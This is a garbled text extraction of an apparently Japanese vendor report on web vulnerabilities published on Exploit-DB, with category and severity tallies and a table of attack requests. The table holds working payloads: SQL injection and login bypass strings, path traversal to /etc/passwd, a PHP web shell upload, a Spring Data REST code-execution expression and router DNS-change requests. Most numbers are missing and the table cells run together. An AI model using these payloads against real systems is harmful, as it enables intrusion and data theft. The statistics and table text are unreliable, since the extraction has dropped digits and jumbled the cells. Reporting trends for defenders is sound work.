最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 08 年

Size: px

Start display at page:

Download "最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 08 年"

こうきしろみず
5 years ago
Views:

1 08.0

2 最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 08 年月に公開された Exploit DB の脆弱性報告件数は 6 件でしたこので最も多くの脆弱性が公開された攻撃は SQL (SQL インジェクション ) です特に Joomla Component でつの脆弱性が公開されましたこので注目すべきことは "" < Release 90"" 脆弱性です当脆弱性はそれぞれ Command, File Upload, SQL 脆弱性を利用して攻撃が行なわれましたこのように様々な脆弱性を利用した攻撃に対しては注意する必要があります当脆弱性を予防するためには最新パッチとセキュアコーディングをおすすめしますしかし完璧なセキュアコーディングは不可能であり持続的にセキュリティを維持するためにはウェブアプリケーションファイアウォールを活用した深層防御 (Defense indepth) 実装を考慮しなければなりません. 脆弱性別件数脆弱性カテゴリ件数 6 8 취약점脆弱性別件数별보고개수 サービス拒否攻撃 (Denial of Service) クッキーセッション (Cookie Session) ローカルファイルインクルード (Local File Inclusion) 6 ファイルアップロード (File Upload) コマンドインジェクション (Command ) リモートDNS 変更 (Remote DNS Change) ディレクトリトラバーサル (Directory Traversal) クロスサイトスクリプティング (Cross Site Scripting:XSS) SQL インジェクション (SQL ) 合計 Denial of Service Cookie Session Weakness LFI File Upload Command Remote DNS Change Directory Traversal XSS Remote DNS Change. 危険度別件数危険度別件数危険度件数割合早急対応要 0 8.6% 高 9.6% 6.9% 合計 % 0 早急対応要高. 攻撃実行の難易度別件数難易度件数割合難.69%.% 易 80.% 合計 % 9 攻撃実行の難易度別件数. 主なソフトウェア別脆弱性発生件数難ソフトウェア名件数 Server 易 uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v 主なソフトウェア別脆弱性発生件数 SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator Spring Data REST 合計 6 Server uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator

3 最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/ SQL 易高 KHTML, like Gecko Chrome/ Safari/. < 0.9.a - Authentication Bypass Content-Length: < 0.9.a username= > &password=%0a Directory Traversal 易 uwsgi <.0. - Directory Traversal /..%f..%f..%f..%f..%f..%f..%fetc/passwd uwsgi uwsgi <.0. POST / HTTP/ :00 User-Agent: curl/.9.0 Content-Length: Expect: 00-continue Command 易早急対応要 < Release 90 Content-Type: multipart/form-data; boundary= Command / File 096f69cccd f69cccd Content-Disposition: form-data; name="file"; filename="pfile.php" Content-Type: application/octet-stream < Release 90 <?php echo passthru($_get['cmd']);?> f69cccd-- POST / HTTP/ :00 User-Agent: curl/.9.0 Content-Length: File Upload 早急対応要 Expect: 00-continue < Release 90 Content-Type: multipart/form-data; boundary= Command / File 096f69cccd < Release f69cccd Content-Disposition: form-data; name="name" anyname.php f69cccd POST /actions/vote_channel.php HTTP/ :00 User-Agent: curl/.9.0 Content-Length: SQL 易早急対応要 Expect: 00-continue < Release 90 Content-Type: multipart/form-data; boundary= Command / File 096f69cccd < Release 90 channelid=channelid=-benchmark( , rand()) mode= exists& =' or ''=' mode=userexists&username=' or ''=' SQL 易早急対応要 Redaxo CMS Addon MyEvents.. - SQL /redaxo/index.php?page=myevents/event_add&myevents_id=' or ''=' Redaxo CMS Redaxo CMS Addon MyEvents Addon MyEvents.. POST /login HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/ SQL 易高 0.9.0c - Authentication Bypass KHTML, like Gecko Chrome/ Safari/. Content-Length: 0.9.0c username= > &password=%0a /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&ord erby=jobid&jobs_per_page=&pool_id=%%0union%0all%0se SQL 難早急対応要 Bacula-Web < rc - SQL LECT%0@@version%CNULL%CNULL%CNULL%CNULL%CNULL% CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNU LL% HTTP/. Bacula-Web Bacula-Web < rc SQL 易早急対応要 TextPattern.6. - 'qty' SQL /textpattern/textpattern/index.php?event=link&step=link_change_pageby &qty=0&_txp_token=baa0ba8d68ef80bb9dd9d8 TextPattern TextPattern Directory Traversal 易 XSS 易高 Advantech WebAccess < 8. - Directory Traversal / Remote Code Execution SecurEnvoy SecurMail Multiple Vulnerabilities..\\..\\windows\\system\\calc.exe POST /secupload/upload.aspx HTTP/. Content-Disposition: form-data; name="messageid" User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/ Safari/. Content-Type: multipart/form-data; boundary= Content-Length: 09 Advantech WebAccess SecurEnvoy SecurMail Advantech WebAccess < 8. SecurEnvoy SecurMail 9..0 name=""><script>alert'xss'&#;<&#;script>"

4 最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 POST /plugins/tracker/?tracker=6 HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 6.0; Windows NT.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: SQL 難早急対応要 XSS 易高 Tuleap Blind SQL Plugin Duplicator.. - Cross-Site Scripting Tuleap report=&criteria%b0%d=&criteria%b89%d=&criteria%b9 Tuleap %D%Bvalues%D= &criteria%b9%d%bvalues%d%b%d=&criteria%b99%d%bv alues%d= &criteria%b99%d%bvalues%d%b%d=(select(0)from(select(sleep( )))a)/**/ &additional_criteria%bcomment%d=&tracker_query_submit= POST /wp-content/plugins/duplicator/installer/build/view.step.php HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/ Safari/. Plugin Duplicator Plugin Duplicator.. Content-Length: 9 json='a';};document.write(alert(document.cookie));myviewmodel%dfunct ion(){this.status%d'' Command 早急対応要 POST / HTTP/. Host : User-Agent: Mozilla/.0 Content-Type : application/json-patch+json Spring Data REST Spring Data REST <.6.9 (Ingalls <.6.9 (Ingalls SR9) /.0. (Kay SR) - PATCH Spring Data REST T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRunti SR9) /.0. (Kay Request Remote Code Execution me().exec((t(java.lang.system).getproperty(\\\"os.name\\\").tolowercase SR) ().contains(\\\"win\\\")?\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"":\\\"\\\")+%s).getinputstream(),t(org.springframework.web.context. request.requestcontextholder).currentrequestattributes().getresponse(). getoutputstream()).x Denial of Service 易高 XSS 易高 POST / HTTP/. XenForo - CSS Loader Denial of Host : Service User-Agent : random.choice(headers_useragents) Content-Type : application/json\ MyBB Plugin Last User's Threads in Profile Plugin. - Persistent <p """><SCRIPT>alert("XSS")</SCRIPT>"> Cross-Site Scripting XenForo XenForo MyBB Plugin Last MyBB Plugin Last User's Threads in User's Threads in Profile Plugin Profile Plugin LFI 易高 POST /wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.ph p? HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. Wordpress Plugin Site Editor.. KHTML, like Gecko Chrome/ Safari/. - Local File Inclusion Content-Length: Wordpress Wordpress Plugin Site Editor Plugin Site Editor.. ajax_path=/etc/passwd File Upload 易早急対応要 - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit) POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: multipart/form-data; boundary=#{post_data.bound} Content-Length: dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" Content-Type: application/octet-stream <? phpinfo();?> dd009908f Directory Traversal 易 POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server Directory Traversal Content-Type: application/x-www-form-urlencoded Content-Length: Server Server XSS 易高 contentdir=/../ POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server Persistent Cross-Site Scripting Content-Type: application/x-www-form-urlencoded Content-Length: 9 Server Server friendlyname=<script>alert()</script>

5 最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 XSS 易高 /wp-admin/optionsgeneral.php?page=relevanssi%frelevanssi.php&tab='><script>var+x+ Plugin Relevanssi.0. Plugin Relevanssi - Reflected Cross-Site Scripting %D+String(%FXSS%F)%Bx+%D+x.substring(%C+x.length- Plugin Relevanssi.0. )%Balert(x)<%FSCRIPT><BR Cookie Session Weakness Remote DNS Change 易 W08R v /goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen= Cookie Session on&ds= &ds= " >/dev/null Weakness Remote DNS Change W08R v W08R v Directory Traversal 早急対応要... - Remote Code Execution POST /oscommerce-.../catalog/install/install.php HTTP/. Host : User-Agent : Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/ Safari/. Content-Type : application/x-www-form-urlencoded; charset=utf-8... \'); system("ls"); /* Remote DNS Change 易 W6R Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds= &ds= " >/dev/null W6R W6R Remote DNS Change 易 Remote DNS Change 易 W00R/A0/w09r v.0.6_en - Remote DNS Change (PoC) FH0/A00 Firmware v.0.68_en - Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds= &ds= " >/dev/null goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds= &ds= " >/dev/null W00R/A0/w W00R/A0/w 09r Wireless 09r Wireless Router Router v.0.6_en FH0/A00 FH0/A00 Firmware Firmware v.0.68_en

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです発見された Cross Site

06.08 サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです発見された Cross Site Scripting らの攻撃は単にスクリプトを使用したりイメージタグを使用するなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチームサマリー 08 年